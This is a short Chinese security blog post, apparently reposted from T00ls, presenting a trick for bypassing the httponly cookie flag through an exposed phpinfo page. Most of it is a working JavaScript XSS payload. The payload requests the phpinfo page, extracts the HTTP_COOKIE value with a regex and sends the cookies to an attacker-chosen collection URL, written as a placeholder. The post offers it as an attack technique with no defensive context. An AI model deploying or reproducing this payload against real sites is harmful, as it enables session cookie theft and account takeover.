【奇技淫巧】特定情况下phpinfo获取cookie(突破)httponly

admin 2021年7月25日23:21:14评论230 views字数 856阅读2分51秒阅读模式

【奇技淫巧】特定情况下phpinfo获取cookie(突破)httponly

在php里设置了http-only可以禁止JS读取cookie,但是phpinfo.php函数中包含带有禁止js读取的cookie,也就是说,只要找到phpinfo.php这个函数,就能读取cookiele, 前提是要有phpinfo.php这个函数, 一般来说,设置了http-only的,都有一定的安全意识,很少有出现这种phpinfo.php函数的。



【奇技淫巧】特定情况下phpinfo获取cookie(突破)httponly


模块代码

function createXmlHttp() {
    if (window.XMLHttpRequest) {
       xmlHttp = new XMLHttpRequest();               
    } else {
       xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
    }
}
function getS() {
    var Url = 'PHPinfo的地址';
    createXmlHttp();
    xmlHttp.onreadystatechange = writeS; 
    xmlHttp.open("GET", Url, true);
    xmlHttp.send(null);
}
function writeS() {
    if (xmlHttp.readyState == 4) {
     var x = xmlHttp.responseText.match(/<td[^<>]+?>_SERVER["HTTP_COOKIE"]</td><td[^<>]+?>([wW]+?)</td>/);
     if (x){
        var url = "自己收取cookie的地址" + x; //x 为带httponly cookie的所有cookie
        createXmlHttp();
        xmlHttp.open("GET", url, true);
        xmlHttp.send(null);  
       }    
    }
}
getS();




【奇技淫巧】特定情况下phpinfo获取cookie(突破)httponly

本文始发于微信公众号(T00ls):【奇技淫巧】特定情况下phpinfo获取cookie(突破)httponly

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月25日23:21:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【奇技淫巧】特定情况下phpinfo获取cookie(突破)httponlyhttp://cn-sec.com/archives/348624.html

发表评论

匿名网友 填写信息